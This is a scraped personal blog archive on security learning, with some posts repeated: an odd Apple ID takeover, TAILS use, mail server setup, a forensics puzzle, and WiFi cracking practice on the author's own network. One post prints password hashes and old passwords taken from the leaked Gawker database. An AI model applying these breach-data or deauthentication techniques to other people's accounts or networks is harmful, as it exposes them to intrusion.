So quick recap. I got an email saying a new iphone 5 has logged in to my imessage account. Problem is, I don't own an iphone, I don't know what imessage is, and the email in the salutation isn't mine. The account has someone else's name and contact information, someone from Finland, but MY EMAIL ADDRESS as the verified account.
I've gone through the find my apple id, and all the info is right when I log in that way, using MY EMAIL ADDRESS for the recovery. When I log in with the apple id it emailed me, I get my stuff in English. When I use my email address as the apple id, nothing is right.
So after I got home, I did some more digging. I found out how to at least "disable" the account even though I couldn't permanently delete it.
Going through itunes, yes I had to install it, I could see that person's information. Not all of it, but some of it. Name, address etc. Same stuff I could see via the apple site.
More checking between the two accounts, I note that my email apple ID is verified, my other one is not. But both accounts have the same email address. Ok, I'll verify it on the account where everything is in English. Only the site won't let me. It's already been verified elsewhere and in use.
WTF...
The best I can figure out, Apple is using email addresses as their primary keys for the accounts now. Something they were not doing when I first signed up in 2005. Since I first signed up they are verifying accounts as well. Once verified that becomes another account key, secondary, or primary in a second table. The problem is, someone not me was able to get my address listed as their verified address and their account.
I ended up un-associated MY ADDRESS With the account, and sent it off in to never land. I hope they have good luck getting their information and account back. I've verified my email address, and have now set it as my account name, with a 30 character password. I'd turn on two factor auth, but I don't own an apple device and that's required.
So the short version of the story. Someone got their Apple account associated with my email address. Claimed my address as their own and got it verified somehow. I got a notification when they used a new phone to log in to the account. Took control of the account, because they had used my email address, de-associated the account with my email address, and then made sure that my account was verified with my email address.
Showing posts with label computer security. Show all posts
Showing posts with label computer security. Show all posts
Friday, September 20, 2013
Apple Account part 1
So today, I got a strange email. I chalked it up to a phishing attempt at first, but it actually turned out to be something way more interesting.
The way it started:
Wait a tick, didn't I get an email a few months ago asking to to verify my apple id? The other email I thought was a phishing spam... (it's been more than 30 days and I deleted it when it came in).
Well no way this is right. I know, I'll prove it's spam. I'm not going to click shit. I'm going to go to apple.com and try to log in.
So I go there, try logging in with my email address, and told invalid password. WTF, okay lets try reset password. And Lo I get an email with the steps to reset my password, and I follow suit.
Go to the account page, some one in Finland, with a UK phone number. WTF. Well this can't be right. Someone set up an account, with a verified email address of MY EMAIL ADDRESS, but that's not me. So thinking someone popped my un-used account.
After not being able to get past the Finish security questions, I decide to call Apple Support. I open a case, and talk to a guy. He tried to help, but in the end, without my IPod or some other way to prove my account (the credit card number wasn't mine either). There was little he could do for me. I will say this for Apple, they do try to take your account security seriously, even if they won't let you delete your account.
The Apple Guy did think of one thing he could do. He walked me through the find my apple id part of the stie. It asked for my name, email address, other possible email address, home address, etc. The next page my DOB (month and day) and then the next page that asked for my security question. A question I wasn't expecting, but knew it was mine. One that only I would know the answer to. And then I was able to change my password.
Then I get an email. Saying my id, yet another one, has had it's password changed. Talk about more confusion. But it was time to leave for ISSA, and I was on my marry way, knowing that both accounts had 30 character random passwords.
to be contenuied
The way it started:
Dear Paula,Your Apple ID (my email address) was used to sign in to iMessage on an iPhone 5 named “iPhone (Paula)”If you have not recently set up an iPhone with your Apple ID, then you should change your Apple ID password. Learn more.Apple SupportWell that's odd, my name isn't Puala, and while I own an IPod Color from 2005, I don't use apple products. In fact I have no idea where that IPod is.
Wait a tick, didn't I get an email a few months ago asking to to verify my apple id? The other email I thought was a phishing spam... (it's been more than 30 days and I deleted it when it came in).
Well no way this is right. I know, I'll prove it's spam. I'm not going to click shit. I'm going to go to apple.com and try to log in.
So I go there, try logging in with my email address, and told invalid password. WTF, okay lets try reset password. And Lo I get an email with the steps to reset my password, and I follow suit.
Go to the account page, some one in Finland, with a UK phone number. WTF. Well this can't be right. Someone set up an account, with a verified email address of MY EMAIL ADDRESS, but that's not me. So thinking someone popped my un-used account.
After not being able to get past the Finish security questions, I decide to call Apple Support. I open a case, and talk to a guy. He tried to help, but in the end, without my IPod or some other way to prove my account (the credit card number wasn't mine either). There was little he could do for me. I will say this for Apple, they do try to take your account security seriously, even if they won't let you delete your account.
The Apple Guy did think of one thing he could do. He walked me through the find my apple id part of the stie. It asked for my name, email address, other possible email address, home address, etc. The next page my DOB (month and day) and then the next page that asked for my security question. A question I wasn't expecting, but knew it was mine. One that only I would know the answer to. And then I was able to change my password.
Then I get an email. Saying my id, yet another one, has had it's password changed. Talk about more confusion. But it was time to leave for ISSA, and I was on my marry way, knowing that both accounts had 30 character random passwords.
to be contenuied
Sunday, January 27, 2013
Really?
Our apologies for the fruit Ninja tweet sent earlier. One of our kids played the game on our iPhone and unknowingly tweeted their score.
Really? Seriously? I'm left wondering. Was this IPhone issued by the department? If it was, why was it where a child could reach it. If I was his superior, I would seriously be asking some questions. Maybe I'm jaded from the bs that happened with the ex-Mayor in Detroit.
Look, I get that Chefs bring their own knives, and that mechanics bring their own tools. However... BYOD is a bad idea. Tell me when has an accountant, a CEO, Lawyer, or any other business unit brought their own filing cabinet, corporate ledger, etc. Ok I know they have the briefcases, file folios and the like, but the damage is smaller with those. It's not everything.
I understand we have commoditized computers and technology, but people really need to think about what that piece of tech does before that hand it someone else.
Sure there are some questions, was it a work phone or a personal phone. If it's personal why does it have work stuff on it? If it's business why is he being handed to a kid, I'd be worried about them reading the other stuff on the phone.
Lastly I'm curious, would this officer hand his service weapon to his child to play with, or leave it laying around where the kid could get it? I'm sure he is shamed by this point, but seriously it is time to have grown up conversations about BYOD and how the devices are used outside of work.
Friday, September 21, 2012
One of the ones I didn't like
So I mentioned in the Plan for IA240 blog post, I had some other ideas. Ones that I decided to not go with for various reasons.
One to those ideas that I rejected:
Using a tablet, with my cell phone as a tether. I tried using my cellphone in class the first night. It didn't work too well. It was rather slow Googling questions the professor was asking.
I also didn't like the idea for a hand full of reasons. I could be wrong, because I don't understand all the tech.
First the tethering. I have a rooted (running cyanogen mod) cell phone, but every time I tried, I get messages saying the network I have for service is blocking it.
I'm still creating a wireless network that someone could try attacking. Other people wanting to connect. Not saying people would, but hacking wifi isn't that hard, and if they're willing to go after a laptop, why not go easier with a wifi connection.
I've only used Shark for Root sparingly. As I understand it, it can do 3g packet captures. I'm not sure if that's only for the phone it's on, or if it can grab any 3g signal. I also haven't found much documentation on it. I also don't have the equipment to test it properly at this time. Maybe we can set something like that up to EMU's IA Club, where we can play around with it and see what it does.
Just one of the ideas, I tossed to the side. I'll talk about another one some other time.
One to those ideas that I rejected:
Using a tablet, with my cell phone as a tether. I tried using my cellphone in class the first night. It didn't work too well. It was rather slow Googling questions the professor was asking.
I also didn't like the idea for a hand full of reasons. I could be wrong, because I don't understand all the tech.
First the tethering. I have a rooted (running cyanogen mod) cell phone, but every time I tried, I get messages saying the network I have for service is blocking it.
I'm still creating a wireless network that someone could try attacking. Other people wanting to connect. Not saying people would, but hacking wifi isn't that hard, and if they're willing to go after a laptop, why not go easier with a wifi connection.
I've only used Shark for Root sparingly. As I understand it, it can do 3g packet captures. I'm not sure if that's only for the phone it's on, or if it can grab any 3g signal. I also haven't found much documentation on it. I also don't have the equipment to test it properly at this time. Maybe we can set something like that up to EMU's IA Club, where we can play around with it and see what it does.
Just one of the ideas, I tossed to the side. I'll talk about another one some other time.
Well Tails works...
Sitting at Eastern Michigan University on the wireless network using T.A.I.L.S. It's a little slow, but that's ok. I'm riding across TOR to an exit node in germany.
To get this to work:
I loaded the system from the Live CD.
Then using the unsafe browser, I was able to get to the capture portal. To do that, you need to go to a non-https site. I like to use www.sluggy.com. Going to www.google.com got grabbed by HTTPSeverywhere, and was dragged to encrypted.google.com. Sadly that doesn't work with EMU's capture portal.
After that, started the ice-weasel browser to make sure it worked right. Which it did. Then shutdown the unsafe browser.
So this works.
To get this to work:
I loaded the system from the Live CD.
Then using the unsafe browser, I was able to get to the capture portal. To do that, you need to go to a non-https site. I like to use www.sluggy.com. Going to www.google.com got grabbed by HTTPSeverywhere, and was dragged to encrypted.google.com. Sadly that doesn't work with EMU's capture portal.
After that, started the ice-weasel browser to make sure it worked right. Which it did. Then shutdown the unsafe browser.
So this works.
Thursday, September 20, 2012
Can't wait for Friday
I found out tonight that the IASA (Information Assurance Student Association) is having their kick off meeting Friday. At 5. Time sucks, but meh.
I'm actually thinking of tossing my id in the bit-bucket for an officer position. Don't know which one yet. I'm sure that'll fly like the NX37602. There are some things I think we could do better as students. Yeah it means more work for us, but in the long run, it makes us better students. No it's not hacking each other. Although some Saturday CTF in L6 would't be too bad. If allowed.
I also got to do some reading on T.A.I.L.S. tonight. I figured I could't be the only one that was having problems with capture portals (have to log in to use wireless). Looks like I was right. And I have something to test on Friday now.
Also, new version of T.A.I.L.S came out tonight. Version 0.13.0.
I'm actually thinking of tossing my id in the bit-bucket for an officer position. Don't know which one yet. I'm sure that'll fly like the NX37602. There are some things I think we could do better as students. Yeah it means more work for us, but in the long run, it makes us better students. No it's not hacking each other. Although some Saturday CTF in L6 would't be too bad. If allowed.
I also got to do some reading on T.A.I.L.S. tonight. I figured I could't be the only one that was having problems with capture portals (have to log in to use wireless). Looks like I was right. And I have something to test on Friday now.
Also, new version of T.A.I.L.S came out tonight. Version 0.13.0.
Monday, September 17, 2012
There will be some more posts coming
So I've tested T.A.I.L.S, it comes with sshfs pre-installed. It's also really easy to use. It looks like all the traffic goes through T.O.R. Next step will to see if it works with the University's wifi.
I've been asked to do a talk on it.
I'm also going to do some write ups on the options I didn't use and why I didn't want to use them.
I've been asked to do a talk on it.
I'm also going to do some write ups on the options I didn't use and why I didn't want to use them.
Sunday, December 11, 2011
more on the new side project
So after looking around, asking a few people and doing a little reading I've updated www.ratsandrogues.com. Kind of funny that that is going faster than setting up rattis.net.
So yesterday, I set up WordPress, and re-wrote the two entries that were on the Rats and Rogues page. Then created two accounts. Then finally set up email using virtual domains (Postfix + Mysql + dovecot, etc).
Wish I could say it was all easy and simple. But it wasn't.
Problems I came across:
Wordpress:
1) www.ratsandrogues.com/feed wasn't working. The feed validator sites were saying not feed webpage. Going there got a 404 error.
2) If I set the url to be a custom for the entries, I could get a 404 error. But leaving the urls set as standard instead of custom would work.
2.5) the settings page for custom url said that .htaccess was not writable.
Solution
It looks like all three issues were related. One large problem with simple solutions but took forever to research.
2.5) created the .htaccess file in the root directory for the wordpress site. then changed ownership to the apache daemon user name.
That allowed the site's setting page to update the .htaccess file.
1 & 2) This one took more time, and lots more research. It looked like that .htaccess file was being ignored. I remember disabling .htaccess when I set up mod_security. Did some reading. I had set AllowOverride NONE in the config file, and I've had to make changes to the vhosts under that global directive. Once I changed that for only the Rats and Rogues site both the rewrites for custom URLS and the feed started working.
Email:
Uh this one was a mess.
1) getting the alias forwarding table to push to multiple people.
2) getting email to forward to the people above.
Solutions:
1) I searched around forever trying to figure out how to insert more than one name in the time. I saw some screen grabs that showed it but no idea how they did it. Then one webpage said that most use PHPMyAdmin. Yeah, didn't want to install that. To make it work:
Which is just the written out way of saying give the value of the 2 columns, 'source' and 'destination', with 2 elements. The first one is the alias email. the second one is a list of emails seperated by commas (,) between the single quotes (') for the second element.
2) With both names in the forwarding table, I gave it a test.
Fixing that required commenting out:
in the Postfix main.cf
Which left me with:
which was there because while trying to fix the other problem I set the domain name in
once I fixed that, everything worked.
So yesterday, I set up WordPress, and re-wrote the two entries that were on the Rats and Rogues page. Then created two accounts. Then finally set up email using virtual domains (Postfix + Mysql + dovecot, etc).
Wish I could say it was all easy and simple. But it wasn't.
Problems I came across:
Wordpress:
1) www.ratsandrogues.com/feed wasn't working. The feed validator sites were saying not feed webpage. Going there got a 404 error.
2) If I set the url to be a custom for the entries, I could get a 404 error. But leaving the urls set as standard instead of custom would work.
2.5) the settings page for custom url said that .htaccess was not writable.
Solution
It looks like all three issues were related. One large problem with simple solutions but took forever to research.
2.5) created the .htaccess file in the root directory for the wordpress site. then changed ownership to the apache daemon user name.
That allowed the site's setting page to update the .htaccess file.
1 & 2) This one took more time, and lots more research. It looked like that .htaccess file was being ignored. I remember disabling .htaccess when I set up mod_security. Did some reading. I had set AllowOverride NONE in the config file, and I've had to make changes to the vhosts under that global directive. Once I changed that for only the Rats and Rogues site both the rewrites for custom URLS and the feed started working.
Email:
Uh this one was a mess.
1) getting the alias forwarding table to push to multiple people.
2) getting email to forward to the people above.
Solutions:
1) I searched around forever trying to figure out how to insert more than one name in the time. I saw some screen grabs that showed it but no idea how they did it. Then one webpage said that most use PHPMyAdmin. Yeah, didn't want to install that. To make it work:
INSERT INTO forwarding (`source`, `destination`) VALUES ('aliasemail@example.com', 'email1@example.com, email2@example.com');
Which is just the written out way of saying give the value of the 2 columns, 'source' and 'destination', with 2 elements. The first one is the alias email. the second one is a list of emails seperated by commas (,) between the single quotes (') for the second element.
2) With both names in the forwarding table, I gave it a test.
<user2@example.com> (expanded from <alias@example.com>): User
unknown in virtual alias table
<user1@example.com> (expanded from <alias@example.com>): User
unknown in virtual alias table
Fixing that required commenting out:
receive_override_options = no_address_mappings
in the Postfix main.cf
Which left me with:
User unknown in virtual alias table
which was there because while trying to fix the other problem I set the domain name in
virtual_alias_domains =
once I fixed that, everything worked.
Tuesday, December 6, 2011
Wednesday, August 31, 2011
times change
So... I don't know.
I got my VPS up and running finally. Went with Linode. Had several friends speak highly of it. Went with a default Debian Squeeze install. Got it hardened as best I could. Now I'm getting ready to hit it with LAMP.
Linux, Apache, Mysql, PHP.
I was thinking LEMP, (NginX instead of Apache), but since I'm going to be running Drupal, and really want an easy set up (follow the howtos and be working kind), I'm going to skip LEMP. Can always change later.
So what will this VPS be doing?
- Personal website. Blog, resume, photo gallory, email etc. Yes I said blog.
- Offer up a site to my martial arts school. Cheaper and more control than what they are using now. Using a CRM framework (drupal again) should make it easy enough to have updated.
- Maybe a site for the Locksport groups
- shell access for me. Mostly for IRC.
- Photo and video exchange site for the parkour group I'm in. Maybe.
I got my VPS up and running finally. Went with Linode. Had several friends speak highly of it. Went with a default Debian Squeeze install. Got it hardened as best I could. Now I'm getting ready to hit it with LAMP.
Linux, Apache, Mysql, PHP.
I was thinking LEMP, (NginX instead of Apache), but since I'm going to be running Drupal, and really want an easy set up (follow the howtos and be working kind), I'm going to skip LEMP. Can always change later.
So what will this VPS be doing?
- Personal website. Blog, resume, photo gallory, email etc. Yes I said blog.
- Offer up a site to my martial arts school. Cheaper and more control than what they are using now. Using a CRM framework (drupal again) should make it easy enough to have updated.
- Maybe a site for the Locksport groups
- shell access for me. Mostly for IRC.
- Photo and video exchange site for the parkour group I'm in. Maybe.
Monday, March 14, 2011
new to me tools
I like finding "new" tools. That doesn't mean that the tools themselves are new, just new to me.
In Information Security, I play mostly on the defensive side. Firewalls, nmap scans of my boxes (the ones I'm responsible for), centralized logs, and google advanced searching.
That doesn't mean I don't want to learn some attacker skills. I'm always trying to learn more, to add more value. Even if the majority of my job now, doesn't involve much security (other than the occasional firewall rule).
Therefore I'm reading books on hacking. The one I'm reading now is Dissecting the Hack: The F0rb1dd3n Network. In the STAR section's first chapter I came across 2 tools that seem to be useful. They're plugins for Firefox.
Passive Cache Search: Lets you search the Google cache of a webpage. Usually searching the cached page still pulls down pictures and other multi-media from the site. But Passive Cache is supposed to have a way to do it as text only from the Google cache
Advanced Dork: Tool to help create advanced Google searches. This one should be fun. It's the one I've been playing with the most out of the two.
In Information Security, I play mostly on the defensive side. Firewalls, nmap scans of my boxes (the ones I'm responsible for), centralized logs, and google advanced searching.
That doesn't mean I don't want to learn some attacker skills. I'm always trying to learn more, to add more value. Even if the majority of my job now, doesn't involve much security (other than the occasional firewall rule).
Therefore I'm reading books on hacking. The one I'm reading now is Dissecting the Hack: The F0rb1dd3n Network. In the STAR section's first chapter I came across 2 tools that seem to be useful. They're plugins for Firefox.
Passive Cache Search: Lets you search the Google cache of a webpage. Usually searching the cached page still pulls down pictures and other multi-media from the site. But Passive Cache is supposed to have a way to do it as text only from the Google cache
Advanced Dork: Tool to help create advanced Google searches. This one should be fun. It's the one I've been playing with the most out of the two.
Monday, December 13, 2010
passwords below
yes, I know I posted passwords below. The only place they were ever used, to my knowledge, was on Gawker, and they have been changed since then.
Gawker breached prior to nov 8th.
So normally, I'd not jump on the sky is falling bandwagon. Really all you can do is change your password everywhere, and then move on.
I have a Gawker account for Lifehacker. I also tend to forget my Gawker password a lot, since I don't leave many comments at LH. So, since I tend to forget it, I just leave it the temp password they send me, and get it reset when I need to.
I saw this tweet from @0ph3lia on twitter tonight:
RT @georgevhulme: RT @headhntr: Gawker source code and database on The Pirate Bay - http://thepiratebay.org/torrent/6034669
I figured what the hell, I'll get the file, see if I'm in it, and what my password is. My password wasn't in the parse_db.txt file, so for fun, I ran John the Ripper against my hash. I'm still learning the tricks with JtR.
First thing I noticed there are 2 hashes for me in the full db text file.
username ::: oKIw1WwUpNP3E ::: $2a$10$f42plGhxPm5Xv1K37keWiO3onjZEfoFWCAIQRWPvYRW5.BZiZ5sCa ::: username@webemailprovider.com
The first one is DES, the second one is Blowfish.
I copied that into 2 files on my BT4r2 box. 1 for each hash. Then I created a password file with my saved password from firefox, and the most recent email I got from Gawker.
Neither password matched. So I went through my email archive and got every password reset email I still had from Gawker.
The password that worked was from September 4th 2009.
============================================
Email from 2009
============================================
Gawker Comments to me show details 9/4/09
You (or someone you know) has requested that your username and password for Gawker Comments be emailed to you. For security purposes, your password has been reset.
Login: username
New Password: ZMvnRxw
============================================
email from November 8th
============================================
noreply@gawker.com to me show details Nov 8
You (or someone you know) has requested that your username and password for Gawker Comments be emailed to you. For security purposes, your password has been reset.
Login: username
New Password: Usql2Aw
----------------------------------------------
I know that I changed my Password on 11/08/2010, as you can see from the emails. Since the files were using a password from before than, I know that the breach happened prior to 10:20 am on 11/08/2010.
Don't know if anyone else is really interested in that part.
I have a Gawker account for Lifehacker. I also tend to forget my Gawker password a lot, since I don't leave many comments at LH. So, since I tend to forget it, I just leave it the temp password they send me, and get it reset when I need to.
I saw this tweet from @0ph3lia on twitter tonight:
RT @georgevhulme: RT @headhntr: Gawker source code and database on The Pirate Bay - http://thepiratebay.org/torrent/6034669
I figured what the hell, I'll get the file, see if I'm in it, and what my password is. My password wasn't in the parse_db.txt file, so for fun, I ran John the Ripper against my hash. I'm still learning the tricks with JtR.
First thing I noticed there are 2 hashes for me in the full db text file.
username ::: oKIw1WwUpNP3E ::: $2a$10$f42plGhxPm5Xv1K37keWiO3onjZEfoFWCAIQRWPvYRW5.BZiZ5sCa ::: username@webemailprovider.com
The first one is DES, the second one is Blowfish.
I copied that into 2 files on my BT4r2 box. 1 for each hash. Then I created a password file with my saved password from firefox, and the most recent email I got from Gawker.
Neither password matched. So I went through my email archive and got every password reset email I still had from Gawker.
The password that worked was from September 4th 2009.
============================================
Email from 2009
============================================
Gawker Comments to me show details 9/4/09
You (or someone you know) has requested that your username and password for Gawker Comments be emailed to you. For security purposes, your password has been reset.
Login: username
New Password: ZMvnRxw
============================================
email from November 8th
============================================
noreply@gawker.com to me show details Nov 8
You (or someone you know) has requested that your username and password for Gawker Comments be emailed to you. For security purposes, your password has been reset.
Login: username
New Password: Usql2Aw
----------------------------------------------
I know that I changed my Password on 11/08/2010, as you can see from the emails. Since the files were using a password from before than, I know that the breach happened prior to 10:20 am on 11/08/2010.
Don't know if anyone else is really interested in that part.
Thursday, May 27, 2010
it's a start
So... I've mentioned the WIFU class a few times now (see the wifu tag below). I've gotten the first wireless card I needed. I still need at least 1 more. I don't have to have another of the same type, but why not? I've got an old desktop I'm going to hook it up on. I haven't started the class yet, but I have started playing around.
Anyway I've tested the usb wireless card in Backtrack4 from the live DVD, in my normal Sidux install on this box (my laptop), and now in the BackTrack4 virtual machine (VM) running on top of my Sidux install.
Tonight, I followed along with the Aircrack-ng tutorials while using the VM with the USB Wifi adapter. I was mostly interested in trying packet injection with the card from the Virtual.
Getting the packet injection to work took some set up. First you have to get the card in monitoring mode, and the test injection had a link to that tutorial. However I don't think it worked every time I tried it from the VM. Sometimes the packet injection would work, sometimes it would fail. I usually had to do airmon-ng stop on both the mon0 and wlan0, then start it again on wlan0 before the injection would work. Annoying but not enough to make me give up.
I was rather excited about getting injection to work, even if it was a bit dodgy. However, I'm not the kind that is willing to leave well enough alone. Since I don't have everything set up yet for the wireless lab I'm building, I decided to jumped ahead to the WPA/WPA2 cracking. (Note I have yet to crack WEP).
I got airodump-ng running on the network I wanted (my U-Verse 2WIRE access point), and could even see the only client (the Sidux install on the laptop, using the built in 3945 wireless chip). However I didn't see any authentication packets in airodump-ng. No biggy, the tutorial tells you how to fix that if you're not patient or only have 1 client.
I was able to deauthenticate the host operating system (Sidux), and even watched was WPA_Gui would reconnect. However airodump-ng never seen the authentication handshake. I tried looking at what was going on with wireshark,and could see the deauth packets going out. But no auth packets. The VM wasn't using the network either.
I'm going to have to get more hardware, I'm ordering the second card this weekend. There are some other things I'd like too... Netbook, desktop, multiple monitors, but that will take longer to get.
I was a little surprised at how easy it was to deauth a wpa/wpa2 connection, and wondering how many people around me are messing with other people by sending deauth packets. I mean after all, I live near one University that has an Information Assurance Program, and the other University I live near is well know for having a great Computer Science / Computer Engineering program. :-)
Anyway I've tested the usb wireless card in Backtrack4 from the live DVD, in my normal Sidux install on this box (my laptop), and now in the BackTrack4 virtual machine (VM) running on top of my Sidux install.
Tonight, I followed along with the Aircrack-ng tutorials while using the VM with the USB Wifi adapter. I was mostly interested in trying packet injection with the card from the Virtual.
Getting the packet injection to work took some set up. First you have to get the card in monitoring mode, and the test injection had a link to that tutorial. However I don't think it worked every time I tried it from the VM. Sometimes the packet injection would work, sometimes it would fail. I usually had to do airmon-ng stop on both the mon0 and wlan0, then start it again on wlan0 before the injection would work. Annoying but not enough to make me give up.
I was rather excited about getting injection to work, even if it was a bit dodgy. However, I'm not the kind that is willing to leave well enough alone. Since I don't have everything set up yet for the wireless lab I'm building, I decided to jumped ahead to the WPA/WPA2 cracking. (Note I have yet to crack WEP).
I got airodump-ng running on the network I wanted (my U-Verse 2WIRE access point), and could even see the only client (the Sidux install on the laptop, using the built in 3945 wireless chip). However I didn't see any authentication packets in airodump-ng. No biggy, the tutorial tells you how to fix that if you're not patient or only have 1 client.
I was able to deauthenticate the host operating system (Sidux), and even watched was WPA_Gui would reconnect. However airodump-ng never seen the authentication handshake. I tried looking at what was going on with wireshark,and could see the deauth packets going out. But no auth packets. The VM wasn't using the network either.
I'm going to have to get more hardware, I'm ordering the second card this weekend. There are some other things I'd like too... Netbook, desktop, multiple monitors, but that will take longer to get.
I was a little surprised at how easy it was to deauth a wpa/wpa2 connection, and wondering how many people around me are messing with other people by sending deauth packets. I mean after all, I live near one University that has an Information Assurance Program, and the other University I live near is well know for having a great Computer Science / Computer Engineering program. :-)
Tuesday, May 11, 2010
more on the Cert
So I mentioned in a little shocked. I got picked for a free cert course.
After some emails around on who was going to take what, I'm taking WiFu. I actually offered to take it, kind of. I still would have preferred Penetration Testing with Backtrack. But I have a better chance of getting a cert with WiFu and I think that is a little more important.
So for the last week or so (little longer probably), I've been looking at getting things together to do the course.
I'm going to get 2 Alfa AWUS036H and 1 BU-353 USB GPS Unit. The GPS isn't needed but will be fun to play with. And I'll finally be able to do Wardriving / Warwalking and map the data out, instead of just saying hmmm... But that's for another post.
I picked up a cheap old Gateway Celeron, 256 meg, 15 gig hard drive. I'm going to toss straight Debian on it, and attach one of the USB Network Devices to it.
I'm going to dig out my old Linksys wireless router, flash it with Linksys firmware (I can put dd-wrt back on it later), and hook the other Wifi device to my laptop running BackTrack. (If don't pick up another cheap PC first).
I'll update the blog as I go along.
After some emails around on who was going to take what, I'm taking WiFu. I actually offered to take it, kind of. I still would have preferred Penetration Testing with Backtrack. But I have a better chance of getting a cert with WiFu and I think that is a little more important.
So for the last week or so (little longer probably), I've been looking at getting things together to do the course.
I'm going to get 2 Alfa AWUS036H and 1 BU-353 USB GPS Unit. The GPS isn't needed but will be fun to play with. And I'll finally be able to do Wardriving / Warwalking and map the data out, instead of just saying hmmm... But that's for another post.
I picked up a cheap old Gateway Celeron, 256 meg, 15 gig hard drive. I'm going to toss straight Debian on it, and attach one of the USB Network Devices to it.
I'm going to dig out my old Linksys wireless router, flash it with Linksys firmware (I can put dd-wrt back on it later), and hook the other Wifi device to my laptop running BackTrack. (If don't pick up another cheap PC first).
I'll update the blog as I go along.
Thursday, April 1, 2010
Wrote a book review
So I said I was reading Hacking for Dummies, 3rd edition. I finished it a while ago. Part of the reason I was reading it was to write a book review for an online magazine.
The book review is up: Ethical Hacker Network Book Review
The book review is up: Ethical Hacker Network Book Review
Monday, August 31, 2009
Ugh... I made a mistake.
I made a mistake.
I've got a lot of work related books to read, and the list is getting longer all the time. Over the weekend I picked up a book on speed reading. 2 actually, at the local library. 1 is a 10 day program, the other I'm not sure about.
Anyway... The NEW 3rd edition of Hacking for Dummies (something recommended at the Ethical Hacker Forums) is coming out soon. The other week, I asked if I should get 2nd ed for 15.00 via Amazon, or wait until December. They said if I could get it now, and read it now, I'd learn more by practicing now, than waiting for the new edition in December. Since I have so much to read, I figured I'd wait. Focus on things that need to get done at work. (Things like setting the networking graphs up (got the ones I needed done), setting up the server monitoring tools (large book), fixing the broken servers (waiting on parts) ).
For some reason between last week, and this week I started looking at the online 2nd edition of HfD on Safari. They won't let me download the whole book, I'm assuming because the new one is coming out. But other than speed reading, that's all I read today (book wise). I finished the preface, the introduction and the first 2 chapters (printed the chapters off for a car pool that did not happen). I've been using some of the tricks I'm picking up in the speed reading book.
Although my reading speed is still between 265 and 300 wpm, with a comp between 70 to 90 % right now.
I'm enjoying Hacking for Dummies, I can't wait to read chapter 3... but I really really should finish Firewalls and Internet Security. I'm about 2/3 of the way done with it so far. The furthest I ever made it. I'm still torn between buying 2nd or 3rd edition of HfD too. I have a feeling I'll end up buying both.
Lastly I should really, really, really be studying for a certification exam (and trying to find a way to pay for it (CCNA, LPI, wouldn't mind Sec+ but I have the books for the other ones)), or writing the essay that's due tomorrow for my 1st gup test in Tang Soo Do.
Lots to do at work too... I'd say I need a time management book, but I've already read Time Management for the System Administrator 2x, and how I'm finding time to do everything I need. I've got a block of time (ie lunch tomorrow) for the essay questions (note they're designed for kids).
Of course, the biggest question at this point is where do I want my career to go?
I've got a lot of work related books to read, and the list is getting longer all the time. Over the weekend I picked up a book on speed reading. 2 actually, at the local library. 1 is a 10 day program, the other I'm not sure about.
Anyway... The NEW 3rd edition of Hacking for Dummies (something recommended at the Ethical Hacker Forums) is coming out soon. The other week, I asked if I should get 2nd ed for 15.00 via Amazon, or wait until December. They said if I could get it now, and read it now, I'd learn more by practicing now, than waiting for the new edition in December. Since I have so much to read, I figured I'd wait. Focus on things that need to get done at work. (Things like setting the networking graphs up (got the ones I needed done), setting up the server monitoring tools (large book), fixing the broken servers (waiting on parts) ).
For some reason between last week, and this week I started looking at the online 2nd edition of HfD on Safari. They won't let me download the whole book, I'm assuming because the new one is coming out. But other than speed reading, that's all I read today (book wise). I finished the preface, the introduction and the first 2 chapters (printed the chapters off for a car pool that did not happen). I've been using some of the tricks I'm picking up in the speed reading book.
Although my reading speed is still between 265 and 300 wpm, with a comp between 70 to 90 % right now.
I'm enjoying Hacking for Dummies, I can't wait to read chapter 3... but I really really should finish Firewalls and Internet Security. I'm about 2/3 of the way done with it so far. The furthest I ever made it. I'm still torn between buying 2nd or 3rd edition of HfD too. I have a feeling I'll end up buying both.
Lastly I should really, really, really be studying for a certification exam (and trying to find a way to pay for it (CCNA, LPI, wouldn't mind Sec+ but I have the books for the other ones)), or writing the essay that's due tomorrow for my 1st gup test in Tang Soo Do.
Lots to do at work too... I'd say I need a time management book, but I've already read Time Management for the System Administrator 2x, and how I'm finding time to do everything I need. I've got a block of time (ie lunch tomorrow) for the essay questions (note they're designed for kids).
Of course, the biggest question at this point is where do I want my career to go?
Sunday, August 23, 2009
How I spent my Saturday Night...
I'm a geek. I know it. Being broke doesn't help matters much.
For fun tonight I played with the Network Forensics Puzzle that was on ISC.SANS.ORG earlier this week.
I'm no expert, some stuff was beyond my skills tonight before I started. In fact I only started playing, not doing the contest, because someone in a forum posted what tool to use to extract the data. Here is a quick walk through of what I did, without giving to much away I hope.
Downloaded the pcap file and checked the md5sum
They matched so I moved on.
I knew how to load a pcap file into 2 different programs, so I ran it in both, filtering on just the ip address I needed (the user's ip address).
I then looked through the data, using what I knew of layout to get the username of who the spy was talking too.
Then I found the first comment. Using the same method (reading), I found the name of the file being transferred.
Then I extracted the data that was transferred from the stream. If I knew the magic number, the only part I wasn't able to find, it might have been easier. I used tcpxtract for that bit of magic.
At fist I was thinking what was extracted was more like rar files you can find online. Where you unrar the first file, and the rest are used to build the first. While I was eating I realized that might not be the case, and there may have been 37 different files that were actually transferred. It was a case of having just learned to use tcpxtract.
Once I realized that, I found the files that would open with Ark, and which ones didn't. The ones that didn't I ignored. I then tried to extract the others. Only 2 extracted. Again the others I ignored. One was a manifest file, the other the file I wanted. I looked up the document in the file and got the recipe.
Then after bashing my head around some, I figured out, based on comments others had made and how the file is really stored, to change the un-extracted file's name to the right name, and tried opening it with Open Office. it worked. Grabbed the md5sum off that.
Out of the 6.5 requests in the challenge, I did 5 of them. I never found the magic number. :( and I didn't bother to try to script it (computer program) to do the work for me. Because I never found the magic number, and I don't think my programing skills are sharp enough. Although, I didn't think my computer forensics skills were sharp enough at the beginning either.
For fun tonight I played with the Network Forensics Puzzle that was on ISC.SANS.ORG earlier this week.
I'm no expert, some stuff was beyond my skills tonight before I started. In fact I only started playing, not doing the contest, because someone in a forum posted what tool to use to extract the data. Here is a quick walk through of what I did, without giving to much away I hope.
Downloaded the pcap file and checked the md5sum
They matched so I moved on.
I knew how to load a pcap file into 2 different programs, so I ran it in both, filtering on just the ip address I needed (the user's ip address).
I then looked through the data, using what I knew of layout to get the username of who the spy was talking too.
Then I found the first comment. Using the same method (reading), I found the name of the file being transferred.
Then I extracted the data that was transferred from the stream. If I knew the magic number, the only part I wasn't able to find, it might have been easier. I used tcpxtract for that bit of magic.
